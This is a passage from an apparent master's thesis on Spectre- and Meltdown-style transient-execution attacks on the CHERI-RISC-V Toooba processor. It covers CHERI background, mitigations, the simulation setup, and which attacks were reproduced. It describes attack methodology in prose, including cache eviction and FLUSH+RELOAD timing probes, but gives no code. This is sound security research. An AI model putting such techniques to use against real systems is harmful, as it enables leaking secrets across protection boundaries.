Van Bulck et al. presented Foreshadow [28], which has the same goal as

Meltdown-US – reading out data without having permission to do so. How-

ever, Foreshadow is targeting Intel SGX enclaves [29] and exploits a different

mechanism than Meltdown. Foreshadow is tailored to microprocessors that

do not allow large speculation windows and where the data to be leaked must

reside in the L1 cache. However, it is possible to access the L1 cache specula-

tively even though access is denied. This is caused by the fact that data access

and permission control is conducted in parallel in an exploitable microproces-

sor [30]. Therefore, even though access is denied the value is fetched into a

register and can be leaked through a side channel. Later, Weisse et al. [31]

presented Foreshadow-NG, which is an extension of Foreshadow that allows

to break operating system or hypervisor virtual memory abstraction.

Meltdown-GP

The GP – General Protection – variant of Meltdown enables an attacker to

access privileged system registers. When accessing a system register, the mi-

croprocessor will check whether the current privilege is sufficient to access it.

If this is not the case, an exception will be thrown. Meltdown-GP exploits that

some microarchitectures throw the exception late or allow computation on the

system register value before stopping executing the instruction sequence. This

allows the attacker to leak the the system register’s value due to a side channel.

This attack has erroneously been named as Spectre v3a in early documents [32,

33].

Meltdown-RW

Meltdown-US demonstrated that supervisor memory can be read out without

sufficient privilege level. Kiriansky and Waldspurger [34] introduced a new

attack initially called Spectre v1.2. This attack seeks to write to pages that are

marked as read-only. The functioning of this attack is similar to Meltdown-

US. The attacker writes to the read-only page and other transient instructions

Page 28: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 2. BACKGROUND 15

follow until the exception is thrown by the processor. The difference is that the

transient executions are in another process. The speculative write of one pro-

cess will trick another process to leak secret information. Following Canella

et al. [19], this attack uses a transient-execution sequence after a faulting in-

struction. Therefore, it is referred to as Meltdown-RW – Read/Write.

2.2.3 Timing Side Channels

Measuring how long a certain instruction sequence needs to execute is a well-

known and often used side channel. The attacker measures the execution time

and compares it to a reference time. Based on that, the attacker decides which

information has been gained. Any sequence of instructions can be used for

timing measurements in theory, but in practice only instruction sequences that

generate measurement results such that the execution times of different runs

deviate significantly are used. Often the access time of load operations is

taken. A load will commit earlier in time if it hits a cache and therefore de-

crease the overall execution time. In the other case, the load will have to go

to the DRAM and the execution time will be longer. Most transient-execution

attacks demonstrated up to now use the FLUSH+RELOAD [18] attack. Here,

the attacker flushes the Last Level Cache (LLC), which is shared between all

cores. Next, the victim will run and load at least one cache line based on the

secrets it computes on. After the victim has been executed, the attacker reloads

an entire buffer. If certain loads are faster than others, the attacker knows that

the victim has accessed the corresponding cache line of the load. This allows

the attacker leak the secret value the victim computed on.

2.3 Security Mechanisms

In order to mitigate transient-execution attacks, academia and industry has

come up with many security mechanisms. The first generation of security

mechanisms was on the software side as they could be easily and quickly de-

ployed. Next, many hardware mechanisms were proposed and implemented

in the following generation of microarchitectures. In this section, I summarise

the most important principles of hardware-based mitigation mechanisms. An-

other mitigation mechanism – SinglePCC – will be explained in Section 6.1.

Page 29: Analysis of Transient-Execution Attacks on the out-of

16 CHAPTER 2. BACKGROUND

2.3.1 Tagging Microarchitectural State

A class of mitigation mechanisms is to tag parts of the microarchitecture with

special values. Tagging parts of the microarchitecture prevents sharing mi-

croarchitectural state between protection domains that are not supposed to

share information with each other. For CHERI systems, the CHERI Compart-

ment Identifier (CID) is a tagging mitigation mechanism that has originally

been presented by Watson et al. [21]. A CID is an integer that uniquely iden-

tifies a compartment and is held in hardware. The idea is to add a field to

each BTB entry that is big enough to hold the CID. When a prediction is made

in the processor, the CID of the compartment currently running on the core

is compared to the respective entry of the BTB. If they match, the prediction

will be deemed trustworthy and the core will speculatively jump to the target.

Otherwise, the core will throw away the prediction results and will wait until

the jump target has been successfully resolved. Similar changes have to be

made for predictions coming from the RSB.

The CID mechanism successfully stops attacks that want to cross protec-

tion domains. A good example of an attack being mitigated is the attack on

sandboxes as it is described in Section 5.1.3. Tagging microarchitectural state

has also been adopted by industry, e.g., by Arm in the introduction of Arm

v8.5-A. The approach applied by Arm is to tag its microarchitecture and also

have special registers that either allow or disallow to use branch prediction

results from one context in another context. This has been implemented in

multiple processors, for example, the Cortex-A77 [36].

2.3.2 Special Instructions

Another option to mitigate transient-execution attacks is to give the users con-

trol of how much they want to share with other compartments. This can be

done by changing the ISA and adding new instructions. This puts the user or

compiler in charge of what can be microarchitecturally visible to other com-

partments operating on the same system. The following paragraphs discuss

several instructions that could be added and what influence they have.

One option is to flush the caches or part of them. Whenever a context-

switch is conducted, the operating system can flush all caches. This will effec-

tively mitigate all attacks presented in the Chapters 4 and 5 as the secret cannot

be recovered by timing measurements. Neither RISC-V nor CHERI-RISC-V

offer a flush instruction yet [11, 12, 37]. However, this does not solve the

problem of transient-execution attacks themselves as the transient-execution

sequence still happens – its effects are simply cleaned up. However, attack-

Page 30: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 2. BACKGROUND 17

ers may be able to find another side channel and use it to recover the secret.

Moreover, the performance penalty by regularly clearing the caches is cost

prohibitive in a system.

Furthermore, it might be an option to add instructions to enable flushing

of microarchitectural state, e.g., flushing the branch prediction unit. This ef-

fectively mitigates cross protection domain training and entry injection. How-

ever, it does not prevent attacks that work by finding a gadget in the victim

domain and this gadget then revealing a secret. Another option is to disable

entire microarchitectural units. This implies performance penalties, but effec-

tively mitigates attacks through a specific microarchitectural unit, e.g., Arm

offers to completely disable memory disambiguation and therefore preventing

Spectre-STL attacks [36]. Another class of instructions that is often used in

microarchitectures is barriers [33, 36]. Barriers – also called fences – do not

allow instructions being executed out-of-order or in speculation to pass them

and therefore enable software to make critical parts of its code secure. For ex-

ample, Arm introduces the Speculative Store Bypass Barrier that works by not

letting speculative loads pass previous stores to the same virtual address [36].

2.4 CHERI

Capability Hardware Enhanced RISC Instructions (CHERI) is a joint research

project of the University of Cambridge and SRI International. The CHERI

project has also been joined by Arm Limited who are developing a CHERI-

extended System-on-Chip called Morello using the ARMv8-A architecture as

the base ISA. The goal of the CHERI project is to enrich ISAs with additional

instructions that enable systems to have fine-grained memory protection and

compartmentalisation. CHERI can be divided into four parts: The abstract

model, the mapping of CHERI to a conventional ISA, the hardware imple-

mentation, and the software implementation. This section describes the key

points of the four parts of the CHERI project for RISC-V. CHERI is explained

more thoroughly in [37], which will be the main source unless stated other-

wise.

2.4.1 CHERI Abstract Model

The CHERI model itself is abstract – architecture neutral – and can in the-

ory be mapped to any concrete architecture. Therefore, CHERI extends an

architecture – referred to as the baseline architecture – rather than introduc-

ing a new architecture. The CHERI model is designed so that it composes

Page 31: Analysis of Transient-Execution Attacks on the out-of

18 CHAPTER 2. BACKGROUND

well with mechanisms already in contemporary systems. This includes Mem-

ory Management Units (MMUs), virtual memory in general, processor ring

models, and the exception hierarchy on the baseline ISA. The main concept of

CHERI is capabilities. Capabilities are tokens owned by a program that are

characterised by being unforgeable and delegatable. A capability authorises a

program to access a certain area of memory. CHERI follows two main design

principles. First, the designers want to enforce the principle of least privilege.

This principle commonly used in the security world says that a program should

only get access and rights it needs for correct operation and not more. The sec-

ond principle is the principle of intentional use, which expresses that when a

choice to select a certain right from a pool of rights exists, this choice has al-

ways to be made explicit rather than implicit. The three main project goals

of CHERI are to provide fine-grained memory protection, software compart-

mentalisation, and viable transition path. A viable transition path means that

the transition from the conventional architecture to the CHERI variant of it

should be possible with a manageable effort. While the first two CHERI goals

are security goals, the latter one is a design goal as the designers assume that

CHERI will not be used in practice without being compatible with existing

systems.

CHERI uses this concept of capabilities and defines their own CHERI Ca-

pabilities in order to fulfill its project goals. The key feature of CHERI is that

capabilities are not implemented in software, but in hardware. Capabilities

and instructions to modify them become part of the ISA. This includes a reg-

ister file for CHERI capabilities as they need more space than conventional

integer pointers. The CHERI model does not specify how these registers need

to be implemented. The implementation can differ from instantiation to in-

stantiation. The following text gives an incomplete list of registers defined by

CHERI:

General Purpose Capability Registers Their usage is comparable to gen-

eral purpose registers on conventional architectures. Code can freely

use general purpose capability registers for loading, storing, and manip-

ulating capabilities, but these registers can also hold non-capability data.

The architectural instantiation can decide how many general purpose ca-

pability registers are implemented. Also the concrete implementation

determines whether general purpose capability registers are an exten-

sion of the general purpose register file defined by the baseline ISA – a

merged capability register file – or whether the two register files should

be split.

Page 32: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 2. BACKGROUND 19

063

p’16 otype’18 bounds’27

a’64

p: permissions otype: object type a: pointer address

Figure 2.5: Compressed CHERI Capabilities in Memory. Adapted from Wat-

son et al [37].

Program Counter Capability (PCC) This register extends the program counter

of conventional architectures so that the register holds capabilities in-

stead of integer pointers. Every instruction fetch is issued through the

PCC.

Default Data Capability (DDC) This register is used if code is not CHERI-

aware. All data loads and stores are issued through the DDC. CHERI-

aware code does not use the DDC, but more fine-grained capabilities

granted to the code running.

Others Depending on the baseline ISA more capability registers are available,

e.g., a register for storing the PCC during exception handling.

CHERI Capabilities want to provide hardware aided security for code point-

ers. The following attributes are enforced on CHERI Capabilities and must

hold at any time.

Bounds The memory accessible by CHERI Capabilities is limited by bounds.

An access outside of the bounds is strictly forbidden.

Permissions The kinds of operations that are permitted on the accessible mem-

ory are limited by permissions. Like bounds, permissions are part of

CHERI Capabilities.

Monotonicity An operation can never add more privileges to a CHERI Ca-

pability, but only restrict these privileges.

Integrity and Provenance A CHERI Capability is always derived from an-

other valid CHERI Capability and it is ensured at any point of execution

that a corrupted CHERI Capability cannot be used as a reference.

Figure 2.5 shows the format of 128-bit CHERI Capabilities in Memory.

This is the format used throughout this entire thesis work. CHERI Capabilities

Page 33: Analysis of Transient-Execution Attacks on the out-of

20 CHAPTER 2. BACKGROUND

contain the pointer address itself, the compressed bounds, the object type, and

the permissions. The bounds are compressed using the CHERI Concentrate

encoding [37, 38]. CHERI defines one bit tags for capabilities that are held

both in capability registers and in memory. These tags protect the integrity

of capabilities and that capabilities are always derived from a valid capability.

The tag bit is not shown in Figure 2.5. The exact bits of 128-bit capabilities

are more thoroughly discussed where appropriate for certain attacks in the

following chapters.

CHERI Capabilities – from now an referred to as capabilities – spread like

a tree during runtime. At the CPU start, capability registers hold root capabil-

ities that have all permissions set and can access the entire available memory

space. Code will monotonically refine root capabilities during runtime as de-

sired. Finally, a user-space program will be granted fine-grained capabilities

aligned to its needs. These capabilities are the leaves of the tree unless the

program decides to refine its capabilities again. The process of deriving capa-

bilities defines a chain of provenance.

Furthermore, CHERI allows sealing and unsealing of capabilities. A sealed

capability is non-dereferencable and immutable, which means that sealed ca-

pabilities cannot be manipulated and cannot be used for memory accesses. Un-

sealing is only possible with a capability that grants sufficient rights to do so.

Sealed capabilities are used for two purposes in CHERI systems even though

more use cases are possible. First, they can be passed to untrusted code, e.g. to

serve as a token of authority. Second, sealed capabilities can be used for pro-

tection domain switching. In an object-oriented environment a sealed code

capability and a sealed data capability constitute the object’s code and its ac-

cessible data. An atomic operation unsealing both capabilities and jumping to

the code capability represents a protection domain switch.

In order to comply with the principle of intentional use, CHERI extends the

baseline ISA with capability instructions. It is always explicit which operands

an instruction has and it cannot by interpreted dynamically, e.g. a load either

loads an integer pointer or a capability. CHERI provides the following classes

of instructions:

Extract Capability Fields Purpose of these instructions is to copy certain

fields of capabilities, e.g. the offset field, to a general purpose regis-

ter for inspection reasons.

Move Capability Purpose of these instructions is to move a capability from

one capability register to another one without modifying the capability

itself.

Page 34: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 2. BACKGROUND 21

Manipulate Capability These instructions allow to monotonically change fields

of capabilities, e.g. the offset field.

Load and Store These instructions allow to load or store data through a capa-

bility, but this class also contains instructions that allow to load or store

capabilities through another capability. The capability used for loading

or storing has to allow that access by being suitably configured.

Change Control-Flow CHERI offers jump and branch instructions. Whether

branches are taken or not depends on capability fields set or not.

(Un)seal Capability These instructions allow to seal or unseal a capability

with another authorising capability. Also, this class of instructions con-

tains protection domain switching.

Check Capability These instructions check whether capability fields match

expected values and throw an exception if this is not the case.

2.4.2 CHERI-RISC-V

CHERI-RISC-V [37] is the mapping of the abstract CHERI model to RISC-V.

As explained above, RISC-V is an ISA design space due to its modular design.

CHERI-RISC-V can therefore also be considered an ISA design space. A par-

ticular instantiation of CHERI-RISC-V may choose to implement multiple op-

tions described in the following paragraphs in a way that it is parameterisable.

Both 32-bit and 64-bit RISC-V are extended for CHERI. The CHERI de-

signers also express the possibility of a 128-bit CHERI-RISC-V mapping when

RISC-V has evolved that far. The length of capabilities is 64 bits for 32-bit

CHERI-RISC-V and 128 bits for 64-bit CHERI-RISC-V not including the tag

bit.

CHERI-RISC-V describes both split and merged register files. The goal of

the CHERI project is to provide hardware that offers memory protection and

compartmentalisation for all kinds of application areas. In a merged register

file, a general purpose register has the width to hold a capability as well. A

merged register file helps to reduce the amount of logical gates on a chip where

this is necessary, e.g., ISAs for embedded processors like RV32E. However,

the principle of intentional use has to be fulfilled. An access to register must

never be ambiguous in the way its value is interpreted.

Besides the load and store instructions for bytes, half-words, words, and

double-words CHERI-RISC-V also extends RISC-V for instructions that can

Page 35: Analysis of Transient-Execution Attacks on the out-of

22 CHAPTER 2. BACKGROUND

load and store floating point values through capabilities. Furthermore, CHERI-

RISC-V allows atomic operations to work with capabilities. Therefore, all

memory accesses in a CHERI-RISC-V can be handled through capabilities if

this is desired by the program. CHERI-RISC-V offers also compressed CHERI

instructions. When executed in capability pointer mode, each implicit register

operand by the compressed instruction is expected to be the capability variant

of the corresponding register.

Furthermore, CHERI-RISC-V introduces Special Capability Registers

(SCRs) that extend conventional RISC-V registers, but also add new registers.

The purpose of SCRs is to enable exception handling with capabilities. They

extend {m,s,u}{tvec,epc,scratch} and add new data capabilities for each of the

three privilege levels for their respective memory areas. CHERI-RISC-V also

extends RISC-V CSRs for capability functioning. Last, CHERI-RISC-V en-

riches RISC-V’s Page Table Entrys (PTEs) such that there is one bit that spec-

ifies whether capabilities might be stored to that page and one bit that specifies

whether a capability might be loaded from that page.

2.4.3 CHERI-RISC-V Hardware

The CHERI project contains three RISC-V processors that have been extended

with CHERI instructions: Piccolo1 is an in-order, 3 stage pipeline processor

that implements RV32ACIMUxCHERI, where xCHERI means that this pro-

cessor implements CHERI-RISC-V as well. Flute2 is an in-order, 5 stage

pipeline processor that implements RV64ACDFIMSUxCHERI and supports

virtual memory as well. Toooba3 is an out-of-order, deep, and superscalar pro-

cessor that implements RV64ACDFIMSUxCHERI and supports virtual mem-

ory.

2.4.4 CHERI Software Stack

There is a large software stack of programs that have been created especially

for CHERI systems or adapted for them. In this section, I describe the impor-

tant bits with respect to the work conducted in this thesis.

1available at https://github.com/CTSRD-CHERI/Piccolo2available at https://github.com/CTSRD-CHERI/Flute3available at https://github.com/CTSRD-CHERI/Toooba

Page 36: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 2. BACKGROUND 23

CHERI-LLVM

The LLVM framework can be split into two parts: the front-ends and back-

ends. The main tasks of the front-ends is to parse the input files and generate

output that is used by the back-ends – the Intermediate Representation (IR).

LLVM supports multiple front-ends, e.g., clang in order to compile C/C++.

Furthermore, each target ISA has its own back-end that generates machine

code specific to that ISA. The CHERI project extended the clang front-end

generically for all supported ISAs such that pointers are represented by capa-

bilities instead of integer values. However, each back-end has to be tailored

for the particular underlying ISA, e.g. MIPS or RISC-V, in order to produce

the correct CHERI instructions needed. These changes constitute the CHERI-

LLVM framework4. The CHERI-LLVM compiler framework also includes

other tools not needed for compiling in the first place, but that are helpful for

debugging, e.g., riscv64cheri-objdump.

Operating Systems

The CHERI software stack includes two operating systems that have been

adopted to run on a CHERI processor. CheriBSD5 is a fork of FreeBSD and

receives the main research focus in OS research within the CHERI project.

CheriBSD provides CheriABI [39], which is an Application Binary Interface

such that applications that use CHERI can communicate with the kernel. The

kernel itself does not need to use capabilities internally, but can. The pure-

capability CheriBSD kernel is currently a work-in-progress. CheriRTOS6 is

a fork of FreeRTOS and intended as a pure-capability system from the very

beginning [40].

2.4.5 CHERI Security Model

CHERI aims to implement two security principles: fine-grained memory pro-

tection and software compartmentalisation. These two principles need to be

guaranteed in all implementations – including in speculation and out-of-order

execution. Cache timing side channels as described in Section 2.2.3 are not

part of the security model. AMD states that their architectures do not pre-

vent cache timing side-channel attacks as well and argues that these attacks

have to be prevented by software [41]. Arm states that timing side-channel

4available at https://github.com/CTSRD-CHERI/llvm-project5available at https://github.com/CTSRD-CHERI/cheribsd6available at https://github.com/CTSRD-CHERI/cherios

Page 37: Analysis of Transient-Execution Attacks on the out-of

24 CHAPTER 2. BACKGROUND

attacks were no novelty. However, timing side-channel attacks in connection

with transient execution were not known [32]. CHERI does not guarantee the

absence of timing side channels, but should give guarantees about transient

execution. This means that transiently executed instructions should not lead

to any privilege escalation. An attacker should never have access to more ca-

pabilities than those granted by the architectural register state and the capabil-

ities reachable through those. Furthermore, CHERI-RISC-V systems should

follow the security model required by RISC-V, which includes separating M,

S, and U privilege mode and their access rights. Attacks can be divided into

three classes expressed in the dependency of the victim:

Independent This class of attacks does not require any action or help from

the “victim”.

Exploitative This class of attacks requires the “victim” to unknowingly or

unwillingly cooperate with the attacker.

Collusion This class of attacks requires the “victim” to willingly collaborate

with the attacker.

It is expected that attackers are able to execute arbitrary code on a CHERI

system, e.g., a user limited to a sandbox who turned into an attacker. An exam-

ple for this could be a JavaScript pulled from web when rendering a web page.

Therefore, an attacker is assumed to be able to attempt independent attacks.

Meltdown-style attacks – as explained in Section 2.2.2 – are typical indepen-

dent attacks. It is further expected that the entire CHERI system should be safe

in the presence of such an attacker even in the case of instructions only being

executed transiently. Furthermore, a CHERI system has to expect that an at-

tacker will attempt exploitative attacks by trying to get the unwitting help of

other code running on the system and having access to powerful capabilities.

Spectre-style attacks – as explained in Section 2.2.1 – are typical exploitative

attacks. For CHERI implementations, any willing collaboration from the vic-

tim side is not expected, which excludes the class of collusion attacks from the

security model used in this thesis work.

2.5 Related Work

Woodruff et al. [21] discussed the applicability of Spectre-PHT, Spectre-BTB,

and Meltdown-US on CHERI systems. They clearly state that capability fields

must not be subject of speculation, but all CHERI checks have to be finished

Page 38: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 2. BACKGROUND 25

successfully before accessing memory. Otherwise the protection mechanisms

of CHERI are likely to be bypassed. They are especially concerned about

cross protection domain attacks on CHERI systems. Therefore, they propose

the introduction of a CID that specifies when microarchitectural state may be

shared with other protection domains.

Gonzalez et al. [42] were the first ones to demonstrate speculative execu-

tion attacks on a RISC-V processor. They successfully reproduced Spectre-

PHT and Spectre-BTB on the Berkeley Out-of-Order Machine (BOOM) [43],

but no other speculative attacks. Furthermore, they did not attempt to conduct

Meltdown-style transient-execution attacks. However, Gonzalez et al. stated

the theoretical feasibility of the remaining transient-execution attacks, which

is proved in my work. Similar work on the BOOM processor has been done

by Le et al. [44].

There has been more work conducted on other comparable RISC archi-

tectures. Arm has summarised and explained the most impactful transient-

execution attacks and explained how they would be conducted on an Arm

microarchitecture [32]. Furthermore, Arm has evaluated which of its mi-

croarchitectures are vulnerable to which attack [45]. The covered attacks are

Spectre-PHT, Spectre-BTB, Spectre-RSB, Spectre-STL, Meltdown-US, and

Meltdown-GP – the attack names used by Arm do not follow the naming

scheme of this work though. Arm clearly states that all other microarchitec-

tures unlisted are not vulnerable to any transient-execution attack. None of

the listed microarchitectures are vulnerable to all attacks, but only to a subset.

However, Spectre-PHT was classified successful on all listed microarchitec-

tures. Moreover, each attack could be reproduced on at least one of Arm’s

microarchitectures. As stated by Canella et al. [19], Arm’s processors are

only vulnerable to a subset of Meltdown-style attacks that Intel’s and AMD’s

processors are vulnerable to. Many Meltdown-style attacks are tailored to the

x86_64 architecture and special features of various implementations of it. Nei-

ther Arm’s ISA nor RISC-V have the necessary features and therefore no im-

plementation is vulnerable to this subset of Meltdown-style attacks. Due to

the similarity in the architectural style, Arm’s summary of attacks also sets the

scope of this work. The four Spectre attacks, Meltdown-US, and Meltdown-

GP will be the main target of this work.

Page 39: Analysis of Transient-Execution Attacks on the out-of

Chapter 3

Methods

In this chapter, I describe the resources I used to conduct my experiments.

Furthermore, I explain which research methods I applied for which part of

this work. The last part of this chapter is to describe common methods I used

and how the actual measurements were conducted.

3.1 Toooba

The experiments presented in Chapters 4 and 5 are conducted on CHERI’s

fork of the out-of-order processor Toooba. Toooba itself has been developed

by Bluespec Inc. that added compressed instructions support for debugging

to MIT’s RISCY-OOO [46] – a framework that allows parameterisable config-

uration of the processor to be built. RISCY-OOO is written in the Bluespec

SystemVerilog Hardware Description Language (HDL) that allows configu-

ration to be conducted more easily. Bluespec HDL code can be simulated

directly or can be compiled to Verilog code, which then can be simulated by

a Verilog simulator or it can be used to produce a FPGA image. For all my

experiments, I compiled Toooba’s code to Verilog code using the open-source

Bluespec compiler1 (release 2020.02). I used the verilator (Version 3.916)

simulator2 in order to produce the results presented in Chapters 4 and 5.

Figure 3.1 shows the parameterisable RISCY-OOO pipeline that is used in

Toooba. The pipeline can be divided into three separate parts: Fetch, Execute,

and Commit. In this figure, the Fetch stage includes decoding and renaming as

well, which is not the case in conventional models of the pipeline, e.g. by Pat-

terson and Hennessy [14]. This part is also called the front-end of Toooba and

1available at https://github.com/B-Lang-org/bsc2available at https://github.com/verilator/verilator

26

Page 40: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 3. METHODS 27

ALU

Fetch Execute Commit

Fetch 1

Fetch 2

Fetch 3

Decode

FPU

ALU

n/2

n

MEM

Rename

n

Commit

D $

TLB

I $

BTB

Reord

er

Buffe

r

IQ

IQ IQ

IQ

Regis

ter

File/F

orw

ard

ing

Figure 3.1: The parameterisable RISCY-OOO pipeline. In my configura-

tion, I chose n=2, which means that Toooba has two ALU pipelines, one FPU

pipeline, and one memory pipeline. 3

instructions are handled in-order in this part. The rename stage puts instruc-

tions in the reservation stations of the respective pipelines of which Toooba

has three: the Arithmetic Logic Unit (ALU) pipeline, the Floating Point Unit

(FPU) pipeline, and the memory pipeline. The ALU pipeline can handle n

instructions per cycle, the FPU pipeline n/2 instructions per cycle, and the

memory pipeline one instruction per cycle. The Execute part of Toooba in-

cluding all three pipelines is completely out-of-order and can execute instruc-

tions as soon as all operands are available to it. In my configuration of Toooba,

I chose n = 2, which means that Toooba can fetch, decode, rename, issue, and

retire 2 instructions in one cycle if no bubbles appear in the pipeline, e.g.,

misprediction may cause Toooba not to be able to commit any instruction for

multiple cycles. Toooba has two ALU pipelines, one FPU pipeline, and one

memory pipeline in my configuration. Processors that can execute more than

one instruction per clock cycle are called superscalar processors. In my in-

stantiation, Toooba is a 2-superscalar processor because it can execute two

instructions per cycle.

Furthermore, I used the TEST cache configuration, which determines the

following settings: The L1 data and instruction cache are each 2 KiB large and

3This figure is borrowed from the CHERI team

Page 41: Analysis of Transient-Execution Attacks on the out-of

28 CHAPTER 3. METHODS

Out-of-order window size 64

L1 size 2 KiB

L2 size 8 KiB

L1/L2 ways 2

Cache line size 64 byte

Load Queue size 24

Store Queue size 14

Store Buffer size 4

Table 3.1: The parameters of the Toooba configuration used for my experi-

ments.

2-way associative, the L2 cache has a size of 8 KiB and is 2-way associative

as well, and cache lines are 64 bytes long. Toooba has a window of 64 instruc-

tions that can be executed out-of-order and the memory queues (load queue,

store queue, store buffer) are capable of tracking 38 outstanding memory in-

structions. Toooba supports Sv39, which means that virtual addresses are 39

bits long. These data are summarised in Table 3.1.

In order to successfully conduct Spectre-BTB attacks as presented in Chap-

ter 4 and 5, I needed to make changes to Toooba’s BTB. Before my changes,

Toooba did not use a hashing function for tag, but used the entire address.

I implemented a hashing function, which is described in Section 5.1.3 as it

poses a contribution to the research platform. Having a hashing function for

tags in the BTB is a common mechanism used in industry [22]. Therefore, I

find that my changes to Toooba’s BTB are no simplification of my work, but

more an adaption to the real-world setup.

3.2 Research Methodology

In this master’s thesis work, I used quantitative research methods in order to

prove the hypothesis of transient-execution attacks being feasible on Toooba.

Transient-execution attacks will be reproduced in assembly and C code. I rely

on the compiling toolchain including the compiler, linker, and assembler to

be correct in order to produce meaningful results. The success of attacks will

be determined on whether the access time to certain memory data is signif-

icantly faster than to others. For all attempted attacks, I used the verilator

simulator, which generates a cycle-accurate model of Toooba’s Verilog code.

In order for my results to be meaningful, I rely on the verilator simulation to

Page 42: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 3. METHODS 29

be correct. Furthermore, the explanation of why an attack works in Toooba

or not is conducted with quantitative methods as simulation gives clear and

objective evidence of which actions Toooba takes when certain scenarios have

happened.

In the discussion of the different transient-execution attacks, I mainly use

quantitative research methods as well. Some Spectre-style attacks are run with

a mitigation mechanism enabled giving quantitative results whether a specific

attack is successful or not. However, I will also use qualitative methods in

order to describe which impact certain attack classes have. The impact of an

attack is determined by the threat model. Threat models and evaluating threats

corresponding to them requires opinions and cannot be expressed in objective

and quantitative data.

3.3 Common Mechanisms

This subsection summarises common techniques used for the experiments con-

ducted in Chapters 4 and 5 or in order to prepare them.

3.3.1 Flushing Caches

Flushing caches is used by transient-execution attacks for two reasons. First,

flushing caches – or evicting a specific cache line – leads to longer miss penal-

ties for loads and more accurate timing analysis. Second, flushing caches pro-

vides a clean state before conducting timing measurements. As explained in

Chapters 4 and 5, attackers want to create the situation that the processor mis-

speculates and the time span until the misprediction is discovered and instruc-

tion are rolled back to be as long as possible. This can be achieved by making

load requests go all the way to memory and not hitting any of the caches. As

described in Section 3.3.2, probing the caches needs a clean state in order to

achieve reliable results.

As stated in Table 3.1, Toooba’s L1 data cache in the TEST configuration

has space for 2 KiB and the L2 cache has space for 8 KiB. RISC-V does not

have a dedicated flush instruction and CHERI-RISC-V does not provide one

either [11, 12, 37]. This means that attackers need to implement their own

flush functions. I implemented a function that loads an entire memory region

into the caches and therefore evicts content previously present. This function

loads in a granularity of 64 bytes as for each load the entire respective cache

line will be loaded.

Page 43: Analysis of Transient-Execution Attacks on the out-of

30 CHAPTER 3. METHODS

3.3.2 Timing Measurements

For the attacks presented in Chapters 4 and 5, I always use the same mech-

anism in order to prove that an attack has been conducted successfully. The

code under attack will speculatively load a value into the core. This value is

used as an index into a shared array between victim and attacker. Probing the

access times to values in this shared array will allow the attacker to recover the

original secret. Throughout all my experiments, I use FLUSH+RELOAD [18],

which is an access-driven technique. In order to successfully probe the cache,

the attacker evicts all cache lines of the array to probe – the flush phase – and

then starts the attack. This leads to the situation that the only cache line of the

shared array being present is the one that was speculatively accessed to reveal

the secret.

As a next step, the attacker accesses value after value in the shared array

and measures the time it takes to access the array as precisely as possible –

the reload phase. The attacker does probe on the granularity of cache lines,

which means on the granularity of 64 bytes in Toooba. The results of probing

the memory addresses [0x80001000,0x800017ff] are depicted in Figure 3.2.

As stated in Table 3.1, Toooba’s L1 data cache has 32 lines, which are indexed

by [0, ...,31]. This number of cache lines exactly matches the 0x800 bytes,

which the attacker wants to probe in steps of 64 bytes.

In the example in Figure 3.2, the victim code has speculatively accessed a

double-word at the address 0x80001100. This reflects exactly the data as the

cache line with index four has a significantly shorter access time than all other

cache lines. All other memory accesses but the very first one require roughly

30 cycles with only small variations. However, the first memory access is

significantly slower with 60 cycles needed. This can be explained with the

cold branch predictor in the assembly code of the probe function. The cold

branch predictor makes Toooba load instructions on a cache line not being

present, which leads to this delay.

The attacker can only measure the presence of a certain cache line, but

not which exact address made the cache line being loaded. This means that

the attacker can only leak a very limited number of bits per probing attack.

In my work, I do not use cache bank collision attacks as described in [47].

Therefore, the only information the attacker can gain is which cache line has

been accessed compared to all possible cache lines.

log2(#cache − lines) = log2(32) = 5 bits (3.1)

Equation 3.1 shows the amount of information an attacker gains in general

Page 44: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 3. METHODS 31

0 4 8 12 16 20 24 280

10

20

30

40

50

60

Cache Line Number

Cycl

esN

eeded

Figure 3.2: Results of probing the L1 cache after an attack has been conducted.

and the exact number in my configuration of Toooba. In order to recover more

than five bits, an attacker will need to conduct the attack multiple times, e.g.,

for a full 64 bit double-word to be recovered an attacker has to do that attack

13 times. The speed of leaking values determines the success of real-world at-

tacks [22, 27]. However, this is out of scope for this thesis work. In Chapters 4

and 5, I present attacks attempted and whether they have been conducted suc-

cessfully, which implies that they are capable of leaking information, but no

claims about the speed and implications of their impact on real-world attacks

are made.

Page 45: Analysis of Transient-Execution Attacks on the out-of

Chapter 4

RISC-V Results

In this chapter, I describe the results obtained by reproducing the different

transient-execution attacks described in Chapter 2 on RISC-V Toooba. To my

knowledge, this work is the first one to reproduce all four Spectre-style attacks

on a RISC-V processor. All attacks together build an extensible framework

for exploring transient-execution attacks on RISC-V processors, which con-

stitutes a platform for further research not only on Toooba, but on any other

vulnerable processor. An extension to the framework is contributed by the

work described in Chapter 5, which extends all Spectre-style RISC-V attacks

to CHERI-RISC-V attacks and adds new Meltdown-style attacks. Describing

the reasons for the success or failure of Spectre-style attacks in both this chap-

ter and the chapter about the CHERI-RISC-V results would introduce many

redundancies. Therefore, I decided to only give a high-level explanation for

most attacks in this chapter and deeply dive into Toooba’s pipeline in the fol-

lowing chapter.

4.1 Spectre Attacks

This section contains the Spectre-style attacks attempted on RISC-V Toooba

in assembly and C. The results are depicted in Table 4.1. An entry marked

with (✓) means that this attack was conducted successfully, (✗) means that I

could not craft a successful attack. An entry marked with (-) indicates that I

did not attempt an attack at all. All attacks could be reproduced successfully

in RISC-V assembly. In order to prove the general applicability, the Spectre-

PHT, Spectre-BTB, Spectre-RSB, and Spectre-STL-Load attacks have been

reproduced in C as well.

32

Page 46: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 4. RISC-V RESULTS 33

asm C

Spectre-PHT ✓ ✓

Spectre-PHT-Write ✓ -

Spectre-BTB ✓ ✓

Spectre-RSB ✓ ✓

Spectre-STL-Load ✓ ✓

Spectre-STL-Jump ✓ -

Table 4.1: Overview of attempted Spectre-style attacks on RISC-V Toooba

and whether they were successful.

4.1.1 Spectre-PHT

The reproduction of Spectre-PHT in both RISC-V assembly and C was con-

ducted as described in [22]. The important piece of Spectre-PHT attacks is to

train the branch direction predictor. The riscy-OOO processor implements

